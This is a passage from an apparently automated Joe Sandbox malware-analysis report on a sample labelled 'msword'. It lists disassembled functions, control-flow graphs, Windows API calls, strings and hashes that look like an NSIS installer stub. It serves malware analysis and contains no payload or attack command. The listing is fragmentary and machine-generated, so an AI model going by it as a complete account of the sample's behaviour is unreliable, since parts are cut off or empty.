                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                        • String ID: @rD$New install of "%s" to "%s"${
                                                                        • API String ID: 2110491804-2409696222
                                                                        • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                        • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                        • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                        • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                        Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                                        APIs
                                                                        • #17.COMCTL32 ref: 004038A2
                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                        • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                        • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                        • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                        • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                        • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                        • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                        • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                        • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                        • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                        • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                        • ExitProcess.KERNEL32 ref: 00403AF1
                                                                        • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                        • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                        • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                        • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                        • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                        • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                        • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                        • API String ID: 2435955865-239407132
                                                                        • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                        • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                        • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                        • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                                                        Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 820 4074bb-4074c0 821 4074c2-4074ef 820->821 822 40752f-407547 820->822 824 4074f1-4074f4 821->824 825 4074f6-4074fa 821->825 823 407aeb-407aff 822->823 829 407b01-407b17 823->829 830 407b19-407b2c 823->830 826 407506-407509 824->826 827 407502 825->827 828 4074fc-407500 825->828 831 407527-40752a 826->831 832 40750b-407514 826->832 827->826 828->826 833 407b33-407b3a 829->833 830->833 836 4076f6-407713 831->836 837 407516 832->837 838 407519-407525 832->838 834 407b61-407c68 833->834 835 407b3c-407b40 833->835 851 407350 834->851 852 407cec 834->852 840 407b46-407b5e 835->840 841 407ccd-407cd4 835->841 843 407715-407729 836->843 844 40772b-40773e 836->844 837->838 839 407589-4075b6 838->839 847 4075d2-4075ec 839->847 848 4075b8-4075d0 839->848 840->834 845 407cdd-407cea 841->845 849 407741-40774b 843->849 844->849 850 407cef-407cf6 845->850 853 4075f0-4075fa 847->853 848->853 854 40774d 849->854 855 4076ee-4076f4 849->855 856 407357-40735b 851->856 857 40749b-4074b6 851->857 858 40746d-407471 851->858 859 4073ff-407403 851->859 852->850 862 407600 853->862 863 407571-407577 853->863 864 407845-4078a1 854->864 865 4076c9-4076cd 854->865 855->836 861 407692-40769c 855->861 856->845 866 407361-40736e 856->866 857->823 871 407c76-407c7d 858->871 872 407477-40748b 858->872 877 407409-407420 859->877 878 407c6d-407c74 859->878 867 4076a2-4076c4 861->867 868 407c9a-407ca1 861->868 880 407556-40756e 862->880 881 407c7f-407c86 862->881 869 40762a-407630 863->869 870 40757d-407583 863->870 864->823 873 407c91-407c98 865->873 874 4076d3-4076eb 865->874 866->852 882 407374-4073ba 866->882 867->864 868->845 883 40768e 869->883 884 407632-40764f 869->884 870->839 870->883 871->845 879 40748e-407496 872->879 873->845 874->855 885 407423-407427 877->885 878->845 879->858 889 407498 879->889 880->863 881->845 887 4073e2-4073e4 882->887 888 4073bc-4073c0 882->888 883->861 890 407651-407665 884->890 891 407667-40767a 884->891 885->859 886 407429-40742f 885->886 893 407431-407438 886->893 894 407459-40746b 886->894 897 4073f5-4073fd 887->897 898 4073e6-4073f3 887->898 895 4073c2-4073c5 GlobalFree 888->895 896 4073cb-4073d9 GlobalAlloc 888->896 889->857 892 40767d-407687 890->892 891->892 892->869 899 407689 892->899 900 407443-407453 GlobalAlloc 893->900 901 40743a-40743d GlobalFree 893->901 894->879 895->896 896->852 902 4073df 896->902 897->885 898->897 898->898 904 407c88-407c8f 899->904 905 40760f-407627 899->905 900->852 900->894 901->900 902->887 904->845 905->869
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                        • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                        • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                        • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                        Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                        • String ID:
                                                                        • API String ID: 310444273-0
                                                                        • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                        • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                        • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                        • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                        Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                        • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID:
                                                                        • API String ID: 2295610775-0
                                                                        • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                        • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                        • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                        • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                                                        Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 KiUserCallbackDispatcher * 2 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                        • ShowWindow.USER32(?), ref: 004054D2
                                                                        • DestroyWindow.USER32 ref: 004054E6
                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                        • GetDlgItem.USER32(?,?), ref: 00405523
                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                        • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                        • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                        • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                        • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                        • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                        • EnableWindow.USER32(?,?), ref: 00405757
                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                        • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                        • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                        • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                        • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                        • String ID: @rD
                                                                        • API String ID: 3282139019-3814967855
                                                                        • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                        • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                        • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                        • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                                        Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                                        APIs
                                                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                        • ShowWindow.USER32(?), ref: 00401753
                                                                        • ShowWindow.USER32(?), ref: 00401767
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                        • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                        • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                        Strings
                                                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                        • detailprint: %s, xrefs: 00401679
                                                                        • Rename on reboot: %s, xrefs: 00401943
                                                                        • Jump: %d, xrefs: 00401602
                                                                        • BringToFront, xrefs: 004016BD
                                                                        • Rename: %s, xrefs: 004018F8
                                                                        • Rename failed: %s, xrefs: 0040194B
                                                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                        • Call: %d, xrefs: 0040165A
                                                                        • Sleep(%d), xrefs: 0040169D
                                                                        • SetFileAttributes failed., xrefs: 004017A1
                                                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                        • Aborting: "%s", xrefs: 0040161D
                                                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
